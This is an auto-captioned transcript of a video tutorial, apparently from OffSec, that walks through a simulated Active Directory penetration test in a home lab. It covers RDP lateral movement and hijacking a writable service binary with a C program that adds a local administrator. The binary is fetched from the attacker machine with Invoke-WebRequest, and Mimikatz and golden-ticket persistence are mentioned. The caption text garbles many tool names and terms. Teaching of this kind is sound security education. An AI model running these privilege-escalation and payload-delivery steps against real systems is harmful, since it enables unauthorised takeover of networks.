Windows Pentest Tutorial (Active Directory Game Over!)

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

this is going a little bit quick now but but it's it's just Soul game or for this domain so I mean we can we can play around for ages here because it takes a little bit of time because it needs to to create the profile here in Windows uh but we have a welcome and hopefully we will see a desktop pretty soon as well so with this we also I mean obviously we do men have been we escalator our privileges on clients and and everything right you can go ahead now start C and D we don't even need to start with this admin because we we are essentially domain admin here net user Mighty slash domain part of the domain admits yeah so today we're actually gonna do a pretty much a full scale simulated penetration test and I'm gonna go to the desktop and my pen test folder which I have some files in we have the cherry tree documentation here we have something called mimikats we're going to have a look at that a little bit later we have some enumeration script PS exec for possible lateral movement later and the PS logged on right so this is kind of some of the tools I like to carry around when I do a pen test so we're going to start moving cats and this is how it looks looks awesome right no uh no graphical stuff or anything it's just text so we just run who are my groups there on the domain controller with our golden ticket injected and we are now built-in administrators we have a lot of other things as well but we are also domain admin on Michael we are a group policy Creator owner we are schema adminster and Enterprise admins and this denied ROTC password replication group right High mandatory level we have access to everything just for everyone watching this is a simulated environment it's a lab it's not a real environment never hack networks that you don't own or have permission to attack so Remy that's what we're doing here right it's just a lab that you guys have created correct this is a lab that I created myself so it's running locally so whenever I need permission to attack something I just ask myself hey can can I attack this and yeah sure we can so we have we have no limitations here today which is which is always fun right hey everyone it's David Bumble back with a very special guest Remy welcome thank you thank you so Remy you got to tell us a bit about yourself I'm really excited about this video who are you firstly and what are we going to be covering I'm really looking forward to this so my name is Remy I've been working in offsetna for well I don't know seven years almost I started back in 2016. my background before offsec was mainly sis Administration I've been working in help desk I've been I've been doing a lot of stuff with technology right my whole life has been technology essentially so when I started in offsec I started as a student administrator a work that I worked as that for yeah about two years so I was helping a lot of students with uh mostly the pen 200 course I believed it was called pen testing with Cali or pwk back then right I had a lot of fun with that and went into some lead positions some technical management Etc and then eventually coveted hit right so we we couldn't do live trainings anymore offsec has been doing live trainings for for a long time and we created this virtual program that allowed us to do live trainings online right so I was a part of that and did demos and and had a lot of fun with students and I also did some live trainings in in real person uh on the pen 200 course a lot of fun as well uh meeting some students live that's cool and not only be on the camera that's great yeah it's nice yeah and now I work as a Content developer in avsec and I've been a part of the the pen 200 2023 upgrade that we released a couple of months ago and I also have experience in pen testing right I got my hands a little bit dirty somewhere last year to do some engagements here and there and try to learn some new things that we can incorporate into our courses right so for everyone who's watching there's a lot of content covered in this video so I've put timestamps below as always use the timestamps if you're only interested in certain parts Remy's doing an amazing demo but there's also theoretical parts to the video where you explain certain things uh because if you don't have that understanding it's difficult to follow along but just use the the timestamps to jump so what I'm really excited about is we talking about hacking Windows right and this is similar content to what's in the in the course right yeah so today we're actually going to do a pretty much a full scale simulated penetration test it's based on the pen 200 content it's not the exact same attack vectors uh or anything like that but it's on the same level right we're gonna Focus mainly on Windows and especially active directory because we're gonna pen test a domain right so we're gonna get a little bit of everything we're going to do some enumeration file transfers we're going to do some windows privilege escalation for example which is a kind of a tricky uh concept for for some of our students right and we're going to mainly focus on on active directory and we're going to do some devastating attacks to the organization and we are assimilating here so that's going to be fun offline you were talking about a golden ticket or something and that sounds like it's going to be a lot of fun yeah so so yeah we're going to do a do a golden ticket here and we're gonna do it as nasty as possible that is just nasty essentially we're gonna gain some persistence in this domain that we're pen testing hopefully if everything goes right and yeah it's hopefully it's going to be devastating and I'm glad this is a simulated pen test and uh and not a real one right because that would be not too good so so I've got some great news as well offsec have given me a discount Remy what kind of discount are we giving people for is it for the 200 course it's actually for uh for a product we call learn one okay so it's uh it's for it's potentially for a lot of courses right so the learn one is essentially um a product you can buy which will give you a whole year of access to to a specific course of your choosing it's very flexible to a learner not really any time crunch there I mean you have a year to to do the course and it's also going to give you access to prerequisites such as if you want to do the pen 200 course you're also going to get access to the pen 100 material right so you don't necessarily need to know pen testing whatsoever to get into this and it's also two exam attempts there we do want our Learners to to be certified and we are continuously adding content so you will get access to most of that as well so yeah so it's a it's a 10 discount right uh yeah it's a 10 discount yeah so for everyone watching use the link below if you want to get 10 off big thanks to offsec for sharing that I don't get any affiliate fees I don't get any money so just disclaimer this is just to hopefully help you I get nothing in exchange for this video but Remy we've spoken enough let's start with the demo absolutely all right so we're going to start our simulated penetration test here right now and as you can see I'm I'm sharing my screen we are logged into kala Linux which is the distro I like to use when I'm doing penetration tests the demo today is gonna be a mix between Technical and not so technical I'm gonna try to explain in a detailed way what we're doing but having a little bit of experience with Windows especially and have a high level overview of what active directories is is going to be a plus for this one because we're gonna do a pen test on a domain right are you running that in on in virtualbox or in VMware or something you said it's running locally right yeah so this is running locally on my computer now currently I'm using hyper-v in Windows so the whole environment we're going to pen test today is actually running in hyper-v so it's a virtual machine yeah so that that gives me the ability to to Really mess my Cali up and just revert it right that happens exactly a little bit too often so yeah but what I think is nice though is I mean what you're demonstrating is this whole infrastructure running on is it on a laptop and um people can replicate it yeah this is on a pretty pretty uh you know fully expect laptop yeah it's uh we're gonna see how many machines we are running in a cup player when we go into the enumeration currently I think it's running like seven machines plus the host itself so it's taking up a lot of resources but yeah it works pretty well and you don't necessarily need six machines or anything like that to to build this yourself either to to get started with active directory especially you need a server and a client you need a domain controller and just a normal client and and off you go right how much remember you got on that laptop uh 32 gigs I believe if it's not 64 I don't even remember now based on how well it runs now I actually think it's 64. yeah so you need a decent amount of ram but it's amazing what you can do but um again I keep distracting you go for it man as I mentioned before we are running a lot of vmc you don't necessarily need to run that many VMS to to get into this right yeah but we wanted to set up a cool scenario and I I think we did right so we're gonna dive into the demo and today we are not really gonna fall Focus too much too much on the enumeration perspective of the penetration test because that can eventually get a little bit dull to watch we're going to focus mostly on attacks yeah the attacks are always funny right enumeration is where you just discover what's out there is is that is that right yeah correct actually I have to say that my favorite part when it comes to penetration testing is in fact in uh information gathering believe it or not I really really enjoy it because you you kind of get to be this detective right okay I need to pull all of this together and we can do certain stuff with it but of course attacks you know that's that's really the cool part right so today we're going to focus on active directory as I mentioned before uh we're gonna find out what to do when we have some credentials uh the goal for the penetration test today is going to be to obtain domain admin in this domain I have running locally here we are going to take somewhat a targeted approach here because if we're going to do all the enumeration everything you do in a normal pen test we will probably be sitting here for a week or you know two weeks right uh Apprentice might even last for months so we need to condense this a little bit so it's going to be it's gonna feel a little bit more targeted but it's still going to be the same attack vectors as you can find in the real world right I have some really simple documentation written up here uh this is just used in Cherry Tree in Cali I wrote it up for this demo demonstration and we're going to do a penetration test a simulated one I just want to highlight that again on a corrupt.com domain and this is the same domain name you will see in the pen 200 Labs if you take the pen 200 course but it's not the same domain right this is running locally on my end and I have been been engineering some cool attack vectors that we're going to use specifically for this demonstration we're going to start in something that we call an assumed breach and assumed rate can be a lot of things right in many penetration tests when you start you might you know you go to the client and the client may give you a laptop and possible a username and a password as well that allows you to log into their system and they will they will hire you to do this internal penetration test right and this is known as a gray box penetration test they give you some sort of access they obviously they don't give you the password for the domain admin or anything like that that's up to you to find us a pen tester but that's really an assumed breach now in the demo we're going to do today we actually take this a little bit step further and I would say that we are towards the latter parts of the penetration test today so in this assumed reach we can say that we have compromised the user in the Corp domain whether you listen and Michael as you can see on my my screen here we have his password as well so we can log into the domain with this user and just for sure we can say that the attack Vector we use terrible social engineering right we tricked Michael here into giving us his username and password or maybe we found it on on some some you know paper he wrote it down on it could literally be everything right but the main part here is that it's an assumed breach but it's not a this is not a powerful user right it's just like a normal user this user is pretty pretty standard yeah it has no admin privileges nowhere in the domain and cherry tree is just like some kind of logging software or what is it yeah so so this is a kind of a you can use it for documentation it's the reason I use it in color now is because it's the live like installed by default but I like to keep my notes there I also use tool such as obsidian for example or OneNote I have also been kind of a sucker for notepad which can become a little bit tricky from time to time you'll just you just dump everything you find into notepad right and you know eventually especially when you Pinterest are a large organization you're gonna get a lot of information as well right so you want to find a tool that works for you but I like to to be able to like in here for example I've added notes so we have computer users and groups and sessions and that kind of stuff so in this case I'm gonna I'm just gonna go through what I personally like to start with when I'm in an engagement where I'm gonna enumerate a domain right I'm not saying this is the correct way I'm not saying this is what you have to do whatsoever you can do what you want as a pen tester it's important to find a methodology that works for you right there is no right or wrong answer here in this case we have enumerated the uh the machines in the domain and we can see we have a total of six machines so the domain is not like it's not huge the first machiner is a domain controller uh absolutely Central piece of the domain that is very important we have a file server web server we have a management server and we have two clients in the middle I have resolved the the IP addresses from their from their host name in case we want to do some scanning with nmap for example from Cali in case we are not able to resolve DNS here then we can Target them with a direct IP address maybe we will have to do that eventually I don't know we'll see and we also have four Windows Server 2022 machines there so four servers two clients and the clients are running Windows 11. I'm glad to see you using like latest version of software not some old thing yeah so when you enormate computers in the domain you might actually end up finding really really old artifacts that were created or or built when when the dinosaurs were still walking the Earth right they might still be logged into the domain and obviously if find such a certain artifact that kind of sales up to be a possible attack Vector right looking at this I don't necessarily see any you know any interesting attack vectors just yet because this is all updated those machines actually have the latest patches and everything so we are probably looking for possible misconfigurations in this domain right that's the computers we can go to users and groups as well as I mentioned it's a very small domain we have the users here a total flow I think seven three of those are default the three you see on top here we have the built-in administrator for the domain the most powerful account and if we are able to get access to this one during our pentas we can do you know really cool stuff not very realistic maybe to get access to this particular account but you know who knows I've I've seen many weird things out there doing penetration tests so we have a guest account we don't necessarily care about that one for now but we have an interesting area this is also a default account care be tdt and this is a very very important account in the domain that is used during the Kerberos authentication process it's used to sign tdt tickets I'm talking a little bit more technical here now right but the care bgt account is very important for the authentication mechanism and we're going to have a look more specifically at what this account is doing eventually whatever you do as a CS admin make sure that no attackers get access to this account because at that point it's it's just game over like literally it's game over so we're gonna we're hopefully gonna see that game over eventually today right okay so we also have four non-default users in the domain here we have Michael Mary Emma and Jeff yeah we have access to Michael this is our starting point today and we'll see if we can get access to the rest as well at some point right a little bit further down here I did some really light group enumeration and those are by far those are not all the groups in ad by the way if this is just for them just a really partial view but I found them a little bit interesting right the reason here is enterprise admin is the most powerful group in the active directory and we can see that the administrator account is is a is a membrane and this is default I'm gonna get to why this group is such a powerful one in a couple of seconds here right looking at domain admins we see something interesting Jeff my name is Jeff he's a member there so just by looking at this our goal is to get domain admin in domain Jeff is a member of the domain admins group so if we at some point are able to get access to Jeff we would essentially be domain admin if we can impersonate him or log in as Jeff that that would literally just be kind of game over for the domain and the end of our engagement right the reason I said that Enterprise admins is more powerful is that in a domain right or in active directory you might have one domain or you might have several domains right so in this case corp.com we can refer to corp.com as kind of the root domain right and in this case it's really the only domain we don't have any other domains here so we don't necessarily care too much about whether we get access to this group or the domain admins group but if you have more domains let's say for example you have a subdomain called sales.corp.com and you have another subdomain called development.corp.com for example right so we have you have three domains you have the root Main and the two subdomains then the Enterprise admin will have full access to all the domains including the subdomains right so that's really powerful if you get access to let's say for example domain admin in sales.corp.com that does not necessarily mean that you are a domain admin in development.corp.com as well or the root domain so there is a domain admins for each domain but there is one Enterprise admins for the whole Forest essentially which gives you access to everything in the pwk course do you teach a bit of the theory of the stuff yeah okay we do correct we are mostly focusing on the domain admins there because we we don't want to over complicate too much here I just wanted to explain the the difference here right now right but the goal in pwk is mostly to get domain admin but you you essentially follow kind of the same methodology if if you target Enterprise admins for example right it's gonna be the same thing but if you are in a multi a multi-domain you know Forest you need to keep this in mind and we discussed already you you've done the hard work of discovering all of this stuff before this and before this video basically um and now you're just going to show how to leverage that information yeah so I'm going through this just to give some context to the attacks we're gonna do right because otherwise the attacks are just gonna be okay how did Remy do this why is it so so just a little bit of content no it's great I mean I think people would have the question how did you find this stuff but we'll cover that in perhaps a different video yeah I mean yeah I mean essentially you have a lot of different tools you can use to enumerate ID but yeah we can discuss that a little bit later I'm just presenting the information for now so we have also two non-standard groups here right we have something called local ADM FS which sounds really interesting and Mary is actually a member of that group right if we look at the naming convention there local ADM most likely has something to do with local admin privileges right and looking at the suffixer fs this corresponds pretty well with a file server that we have in the domain so we can do an educated guess now and say that okay if we are able to impersonate Mary at some point we might have local admin access to the file server in a domain there are many ways or more enumeration we could do where we could look at the description for the group for example we could enumerate something called group policies but those are out of scope for pen 200 so I didn't want to add more you know confusion stuff in there right now so Remy the a question that people may have is what's the difference between a local administrator or local admin versus a domain admin sorry so a local admin is an admin on that given machine only right so so let's for example we can go back to our computers here a domain admin would essentially be also an administrator all those machines yeah right yeah so you you can log in here with your domain admin account I really really don't recommend doing that by the way never do that just just don't now I want to write a login is root and administrator yeah we're going to see more that's a bad idea later right but essentially a domain admin has access to pretty much everything in the domain but the local admin may have access to like for example client of one here if I add the user Mary to the local administrators group on this particular machine only on cliento one then Mary's only going to be a local admin on that particular machine she's not going to be a local admin on management or webo to your right we're actually going to see a little bit more clear difference between a domain login and a local login when we start the attacks today so so hopefully that's going to make a lot more sense then the last group here RDP web uh Michael is a member there and taking an educated guess here we can probably say that Michael should be able to log in Via RDP to the web server right and again we can do more enumeration on this but this seems to be the Michael user seems to be rather interesting after all right lastly in the enumeration we have a tiny bit here we run PS logged on on the servers and we found on web O2 here which is a domain server that Corp Mary is actually logged in based on our enumeration marriage should be a local administrator on the file so too right enumerating computers users and groups and sessions usually are an eye-opener for what you can potentially do right and I wrote up this highly theoretical by the way we need to prove if this is going to work or not I have an attack path here so the goal now is to start with Michael we're gonna try to RDP into webo 2 as Michael if we are successful in doing that that would actually count as a lateral movement attack in the in the in the domain it doesn't have to be some super fancy you know the PSI sick or you know evil winner or that kind of stuff to do lateral movement if RDP is open and you can use it boom lateral movement right lateral movement is just where you're moving from one machine to another right essentially yeah you obtain credentials and you just move around like like a madman where you can right you want to get access to as much as possible essentially so my plan here if we are admin we don't know that yet right if we or if Michael is an admin on fi on web or two we're gonna try to steal the credentials from Mary which is logged in on on Weber 2 right if we are not local admin we will have to escalate our privileges after escalating the Privileges we can try to steal marriage credentials again because in order to steal those credentials we need a local well it doesn't necessarily need to be a local admin we need to be an administrator or we need to be system on the machine because we need to tap into a specific process in order to steal those credentials right so we may have to do some escalation here with Mary if you know the Stars line and everything is fine and we should be able to access file sub 2 as local administrator and then who knows what happens right we we cannot we we cannot possibly tell right now and I wish I could see into the future but I can so I don't know if any of this is gonna work uh but this is a highly Theory uh theoretical attack path now and something I kind of cooked up in my head just based on the information we have gathered but I love that you've given us sort of like you've logged the details of what you've discovered and then you've come up with an attack paths which is great yeah yeah that's great yeah so that's it for the enumeration part for now right we we just went through you know some documentation and now it's time to to finally do some some hacking right so I'm gonna minimize uh my cherry tree here now and I'm gonna open a terminal in Cali and I have some long commands today which I have documented so for everyone watching I put the commands below to a GitHub link where you can you know just copy the commands so don't worry about trying to like copy them while we while you're watching the video so Remy thanks so much for sharing the command center and it'll obviously make the video quicker so again use the link below sorry Remy to interrupt carry on no problem at all no problem I also need to do some explanation here on what we're actually doing in order to to connect to this machine right so we're using a built-in Tool uh RDP client called X3 RDP in this case which is installed in Cali you don't necessarily need to use this you can use your own personal preference like you know our desktop there are so many clients out there but you should be able to connect with most of them right so what's more important here is that we are using the username Michael which we you know we found this password and username right so username Michael the password is my lead password is a very very nice password right yeah uh so so Michael is probably very leader and and this is downfall yeah yeah yeah we're gonna prove him wrong right yeah so the main the main important part here is the Slash dcorp.com and this kind of goes a little bit back to where we talked about local admin versus domain admin and that kind of stuff because Michael he probably does not have a local user account on the machine we're connecting to this is the IP for webo 2 by the way so if we don't specify the domain here Michael will not be able to log in we need to specify the domain name uh the rest there this is just me doing some funding and resizing to to make this look good so this is not necessarily something you need to you know connect the RDP to a machine those parts are the most important models and we're going to use those many times today so let me go ahead and click or hit enter here and hopefully we will be authenticated somewhere and it seems that we are all right so we're logged into this Windows machine right and I don't necessarily like graphical user interfaces too much so I'm going to go ahead and just start command prompt here as a true hacker right I was going to say what what is this what's a GUI come on yeah well what is it like who knows right we are in command prompt now and we can start looking at some some commands right we can type hostname for example this shows that we are indeed logged in on the Machine level 2. so we are logged in on web or two here and who are we who am I right simple commands we are Michael so we can see that here what's important to note is that we have this prefix here called Corp this tells us that we are connected to thecorp.com domain we are not logged in locally on a wemble 2 machine if it's set available to you here we would be a local account on the machine but we're not we are in the domain right and so what this this is the lateral movement thing where you were able to jump from one machine to another and log in with this user which you know someone fished these details or we found it online or something right yeah so once I actually did RDP here that would count as lateral movement technique in active directory uh because we are not connecting to the laptop we were given to the client anymore we are we are connecting somewhere else with some credentials we found and anytime you move from one machine to the other a it kind of counts as a lateral movement and if all the haters that might say well this is dumb because it's too easy but this is the stuff that happens right people's credentials are leaked this has happened or yeah this happens trust me and I'm gonna have to agree that this was a really simple attack right now but we are going to get more complex down the line right so we start light and we we end I'm not gonna say nightmare but it's going to be a little bit more tricky we're not just gonna RDP it's like what Jeremy said in the last interview it just gets better and better right so yeah yeah that's the goal here right okay so yeah as as a recap we are logged in November 2 as Michael I'm doing a lot of CLS by the way just to clear my screen so like this and just to show the user accounts on the local machine if I do net user for example we can see that there is no Michael user here and this further illustrates that we are not plugged in with a local account this administrator account is the local administrator for the Bible 2 machine this is not the same administrator account as the domain admin right there are many many many administrators in this in this network and who knows maybe this one is is interesting for us I mean I don't know we'll have to we'll have to see right I know that there can be a little bit of confusion about okay am I local or or or am I in a domain right the best way to figure it out who am I and you will see the the domain here if you see the hostname for the machine you are logged in locally so clearing the screen again and our goal now if we go back to the territory documentation and look at the attack paths we have RDP into webbo too if you're our admin we're going to try to steal marriage credentials because she is also logged in on this machine right if not we will have to escalate so so far on this point our theater Theory proves true right we were able to RDP that's good and let's see what we can do do more here now I'm gonna do here my slash groups here so I typed who are my groups here in the command prompt because I want to learn a little bit more about this Michael user right and this will give me an overview over local groups on the machine that I'm a member of and also the domain groups so in this case we see that we are a part of everyone that makes sense right because we are a user actually on the machine now we are a part of the built-in users we are a remote desktop users the the ones you see here are pretty standard right not nothing really special about those permissions and we can see that on the on the right side there as well well-known group right we also have Corp backslash RDP web we already knew that this is a ad group in this case we actually see the security identity fire for the domain itself add the relative ID for this group which is 1607. now this make note may not make a lot of sense right now but this this security identifier is going to play a crucial role eventually when we're going to be a little bit more devastating to the to the organization right but looking at this we do not have any reference to administrator or anything so it really seems like we are not the local admin on this machine based on this because then it would probably say built-in administrators here right we can potentially try to start command prompt as administrator but we are getting a UAC prompt here which asks us for credentials and if we were logged in with a local admin here we would essentially just have to click yes or no on this prompt in this case we need to enter credentials and this tells me okay we are not very likely we are not our local admin on the machine looking back at our attack path we wanted to steal Mary's hash right that's kind of our our goal here but we cannot do that unless we are local admin on the machine in this case when need to do something called privilege escalation and that's essentially you go from one user and you elevate your privileges on the machine right and that can often be a little bit tricky both for Linux and windows it's not necessarily my favorite field of expertise either but as a pen tester you just simply have to do it from time to time that's that's just the way it is often a pen test as well when your hand they handed this laptop you're most likely a low privileged user there and one of the goals from the client might be to escalate the Privileges can you escalate our laptops we need to look into some some ways to escalate our privileges here and for the last couple of years there's been more automation when it comes to this kind of stuff right back in the days when I started as a hacker we we essentially had to write our own scripts to enumerate this and that like okay I want to enumerate all the users I want to enormate services and you you kind of type a script to do that for you and output you know the details right nowadays we have tools such as wind peace for example it's a really really great tool that will essentially go through the machine check for permissions on on different folders check for anomalies right in Windows and point you towards okay hey this might be something worth checking a little bit closer you get that from GitHub or somewhere yeah you can find it on GitHub you also can find pre-built executables for it so win peace exe be careful though you want to make sure that you're downloading the correct file exactly just be careful in general when you're working this kind of field never trust anyone right so but yeah windps is a great tool it's going to iterate through everything on the machine for you and kind of point out the anomalies I'm more of the the manual guy when it comes to this kind of stuff and while I like automated tools I also like to know how to do stuff myself right I don't want to put all my trust in this okay I'm gonna run this tool and hope that it's gonna give me something and if it doesn't I'm gonna just deem that okay this is the this system is secure right I just don't want to go down that path as I mentioned in the beginning here we are doing a simulated test and we I'm not going to enumerate the entire window system right now because that's just going to take too much time but if you are like me you like to do things manually you might browse through the file system look at okay how many users has a profile here what kind of applications are installed right if there is a vulnerable service for example you might be able to find an exploit for it and just boom you can exploit it and possibly elevate your privileges at the same time so in this case we're actually gonna we're gonna do this manually and this is going to be somewhat targeted right I'm gonna start Powershell on the web O2 machine and I'm going to run a rather long command here in this case we are running something called getsim instance and same stands for common information model for enumeration purposes I would really compare this to wmi which is the Windows management instrumentation but Sim is is going to provide you with Crossfire cross-platform the capability and it also has some enhanced remote capabilities for system admins and that kind of stuff right so it's kind of the new hot thing to use we don't necessarily need to use it but I'm trying to stay at least a little bit up to date on the new tools we are using right so in this case we are going to use get net Sim or get SIM instance on the win32 service which is uh which is a wmi class that provides information about services on the machine we're going to ask for the name so we we pipe this into select right we're going to select the name we want to see the state of the service whether it's running or disabled and that kind of stuff the path name which is the the path to word executable for the service is what execute what executable is is being executed when the service starts right and the start name who actually starts the service because this plays a vital role if we want to escalate our privileges in this case we pipe all of this into bear object whereas state is going to be like running because first we're gonna enumerate the running services and yes we should probably know right Disabled Services stop services and that kind of stuff as well because we might be able to to use those for for something evil as well but let's start with running we need to start summer right David so let's hit enter and be amazed on the output we receive here this can be a little bit intimidating especially if you're if you're new to Windows privilege escalation right we have received a lot of information here and by default there is a lot of per or a lot of services running in Windows as well and many of those are default yeah it's it's actually rather insane now I want to give an example right away on why exactly I'm doing this okay why is remember looking at the services what's his goal here right just as an example we can look at the the spooler service here right the name is spooler and we can see that the running executable for this one is spool sv.exe so when a spooler service starts it's gonna run this executable air right this is the path for the executable for for the service looking at the right side this one is being started as local system I'm not saying the spoiler service is vulnerable here right but if we are able to replace this exe file with some malicious code and that txe file is being executed by local system what's going to happen right we're actually going to have command execution as local system on the machine a local system is the highest privilege you can have you can have on a Windows machine right let's say if we are able to replace this one with for example a reverse shell that connects back to us in a listener we have in Cali we're going to get a system shell and we have full control over the box right so that's the goal there looking for for you know weak permissions essentially so looking at the output here we have a lot of services but we can see that many of those are pointing to C colon Windows system 32 here we have SVC host exe for example we have a lot of default Services here and we we don't necessarily want to try to replace SVC house exe right and we are essentially looking for anomalies here I like to stay away from whatever where I see see colon Windows system 32 and as I mentioned before we need to start somewhere so so let's look for some anomalies here right browsing up a little bit we actually have one here it's it can be a little bit tricky to see but we have a MySQL service running here called xampp well actually the service is called MySQL right but we can see the executable for it this is not the standard service in Windows xamp is something some C submin has installed on the machine at some point and this is kind of is sailing up to be one of those interesting ones right especially if you look on the right side here because this service is also running with local system so again if we are able to replace this exe file with a malicious code it's gonna execute this local system and we can do a whole lot of stuff right so this one is interesting going a little bit further up here on the top we can see Apache 2.4 is also running and we can see the path executable which is also exam so in this case it seems like the the system installed example the machine using it to to to serve some sort of web application with mice database on the back end right and this one is also running as local system now the goal for us we don't know if this is going to work yet by the way but the goal is essentially to replace this exe file but in order to do that we need to have the correct permissions right and we need to find out those permissions so I'm going to go ahead and copy this and I'm going to clear the screen and I'm going to use a user tool which is called I I'm not sure if I pronounced this correctly but I call it eye cackles this stands for integrity Access Control access list it's a very fancy word right for something that does something fairly simple it's installed in Windows by default and it can essentially be used to well the technical correct term would be to enumerate the access control list on a binary or a folder right we can use this to enumerate binaries and folders the permissions there and we're gonna point this to I copy the the folder earlier but I think I might remember it it's gone from my clipboard now but exam Apache been Apache or httpdexe was it right httpd like this so we can point this tool to this particular file and see the permissions so that was a good point for the previous tool was that is that also built into Windows or did you have to install something to run that no that's built that's built into Powershell the getsim instance is is a Powershell Command right so you haven't installed any malicious software yet it's just using the built-in tools at the moment yeah yeah we are leaving of the land as we like to call it yeah so running the tool here we are now specifying an HTTP deexe file and we can see the first occurrence of a user here right NT Authority system we can see an eye here this simply means that the permission that NTA Authority system has is being inherited from the parent folder here right so this is this is probably the same permission of being Apache example and the C drive itself because the entity Authority system is the most privileged account and we can see the affair that means full access and it's the same for administrators no surprise really because an admin would be able to to do modifications on this file but if we were a system or admin we wouldn't even be in this situation right because we didn't we wouldn't necessarily have to escalate our privileges we would be able to to achieve our goals but we are just essentially a built-in user here and the built-in users they also inherit the permissions from the parent folder but in this case we have no full access we have R which means read permissions and X means executable permissions right so we are not able to replace the cxe file with the permissions we have here we can launch the file but what what is that going to do right yeah start the web server I mean it doesn't really it won't help us so we need to look a little bit further I'm going to run the same on the SQL xampp let's see MySQL bin MySQL D file as well like this and here we kind of see something really interesting right away the built-in users which we are a part of has this F right so we have full access there it's actually listed twice here because the C submin did something really strange here trying your dumb dumb and also a little bit strange I will have to to arrest myself here because I set this up right of course but we can blame Jeff the domain admin my name is yeah in in the in the system here so we have two occurrences here we have two built-in users they both have the F so that they have full access the I on this one means that it's inheriting permissions from the parent folders right this one just means that we have full access to this particular file so this tells me that the suicide bin has actually logged into this machine first given full access to well I don't know what's first right but they might have given full access to the MySQL the exe file to the built-in users and then afterwards given full access to the whole structure right I mean I don't know but there are two things going on there and of course we have the NT Authority system and the administrators that they still have full access right and to further further like set this a little bit in stone we can do the who are my groups again right and looking at this as a whole now we we are running here mys Michael we are a part of the built-in users and looking here we have full access to this MySQL deexe file and we can actually replace the file if we want to it's crazy that you as a standard user can get all this information right it is it's actually a little bit scary about the normal users can get also with ad enumeration there are so many things you can you can query the domain controller for Via ldap as long as you're just connected to the domain it's uh it's kind of mind-blowing in this case I mean I'm I'm I've said many times now we're going to replace this file but in an engagement even though this webo 2 server is within the scope I don't think it would be a good idea to just go ahead and replace the MySQL file right because the service is eventually gonna crash if we try to restart this service and it's going to start with a malicious exe file then MySQL server is not going to be available anymore right this might be a critical a piece of component or or a critical component rather for the organization right if they lose access to their database you know we make awesome Mayhem before you do this in a penetration test if you're a serious penetration tester you will contact the client you will lay down this scenario okay this is what we can do what we can see here is that actually prove enough that we are able to to replace this file and we don't necessarily have to go ahead and do the attack itself in order to progress through the pen test a little bit we might have to do that but instead of bringing the whole system down maybe you can work with a client and they can give you the admin access instead of you giving yourself the admin access on a web or 2 server Yourself by breaking it right because this is a proof that we can actually conduct this attack I mean that whole point is it's a penetration test you're not hacking you're trying to trying to help the client yeah yeah exactly and you're not really helping the client if you jump on the for on the first vulnerability you find and you just crash the whole system not really yeah that's not the goal right but as I said I'm the creator of this lab and I talk to myself earlier here is it okay if I if I mess it up a little bit hell yeah right so you got snapshots so you're good I have snapshots so I can always just revert back so already saving Remy permission to hack Remy yeah no problem right so we're going to do this attack I'm going to go ahead and clear the screen now because this is a little bit messy I'm also going to minimize the RDP window because we're going to go back to Cali now I'm going to open a new terminal and let's call the previous terminal web O2 RDP right just to keep it a little bit clean here and I'm going to go to the desktop and my pen test folder which I have some files in we have the cherry tree documentation here we have something called mimikats we're going to have a look at that a little bit later we have some enumeration script PS exec for possible lateral movement later and the PS logged on right so this is kind of some of the tools I like to carry around when I do a pen test and I've added it to the pen test folder now because we may have to download them from the from the cal machine later right so I'm gonna create a c code here and hopefully create an executable that we can use in in Windows right now a lot of your viewers now David is probably gonna arrest me but I'm gonna use Nano for this that's okay uh I don't want to spend 30 minutes trying to understand how to enter text into VI right so yeah you're gonna start a war I'm gonna start the war now but yeah so so I arrest me if you want right I I just I do I'm just not capable of using VI I need to use the Nano here so for everyone watching Remy's in the states right yeah right I mean it's a normal country yeah for sure so I'm gonna create a file here called aduser.c which is just gonna be a C file essentially I'm gonna do a copy and paste you now with the source code because I don't want to type this out on the Fly here so essentially this is uh as simple as it gets right we are including a standard Library here we have a main function right we are declaring an integer uh named I and the variable is used to store the return value of system here right so this is you you don't need to know a lot of C to to understand this you you don't necessarily even need to know C at all you can copy this right we're essentially asking the system air to Run net user this is like if we are on a Windows system it's a window system as admin we could type this out in a command prompt right so net user Mighty this is gonna be the username might is my my handle on Discord by the way if you wanna if you want to say hello there and the password in this case we have a super weak password in a penetration test if you're allowed to do this attack pick a stronger password right be a responsible penetration tester and we have the slash ad there so this command is hopefully when it's being run a system as we think it will be it's going to add the user to the to the local local box web or two with this password then once this is run we're gonna run net local group and we're going to try to log or add the user Mighty into the administrator's group right so this is the way you would do it if you were an admin on a box you would type those commands in order to add another admin now you might notice that I don't have any slash domain here now if I for example log in as a domain admin and I run the same command but I do slash domain I'm actually going to add a user to active directory and I could essentially do net group domain admins and add myself there because you have the power to do that as a domain admin right the problem here is that the service the MySQL the service we talked about is not running in the domain context it's running on the local box on Weber 2. so this is not going to be a domain user but hopefully it's going to be a local user that is being added to the administrator's group right okay so we're going to save this as ADD user.c right like this and if I do LS add user see here now we can see that we only have ad user.c file which contains our source code now we need to compile this because we need an exe file and we can do this pretty simple with a cross compiler in Cali which is installed by default as well I'm going to use x86 Ming w32 here in GCC this is often used to compile exploit code for example or create you know simple Windows executables as we're doing here right this is used quite a lot by penetration testers and the only thing we need to do is to feed it the the source code or the C code we have here and specify an output file so in this case the output file let's go with ADD user.exe and no errors this is I'm not a program grammar by the way and this is almost a record for me because always when I try to compile my own code it's just a bunch of errors and warnings I used to like get rid of errors and I don't really care about the warnings right but in this case it worked uh let's do LS add user and a wildcard again and we can see that we have we have the C file we can delete that now we don't need it anymore but more importantly we have the address exe file so we need to transfer this over to Windows somehow now to the rebel 2 server right now there are many ways to do this uh in one of our courses we we actually have modules on file transfers right there are so many ways we can do this we could set up an FTP server on Cali and kind of tap into that from from Windows we can set up SMB share what I personally like to do is to use a web server because from the available 2 client we should be able to reach our calendar machine anyway and if we set up a web server it's so easy to just download files using Powershell for example right I'm going to clear the screen and I never remember my IP address so I'm gonna do ifconfig eth0 and this is the IP address on my Cali attacking machine and if I set up a web server here now I should be able to reach it using this IP right to set up web server we'll use Python 3 we can also use Python 2 for this but I'm trying to you know be a good boy yeah be a good boy and we're just gonna use the HTTP server module and we're just gonna serve this on Port 80 right so like this now it's currently serving on all interfaces including it h0 and we should be able to to copy this and go into the Windows machine and get that user.exe file so I'm going to open command prompt again hostname we are still on level two as Michael I'm going to create a file well actually I'm going to create a folder so we're going to create a folder called pen test if I do a let's say now the well actually I need to move into the folder as well and if I do LS the folder is empty right now with Powershell we can for example invoke web request right it's a very simple way iwr short for invoke web request you can point point to a URI and we will just type HTTP or IP address for Cali slash add user.exe because we are currently serving our pen test foldering Cali right the out file let's just call it at user.exe for now eventually we need to rename the file to 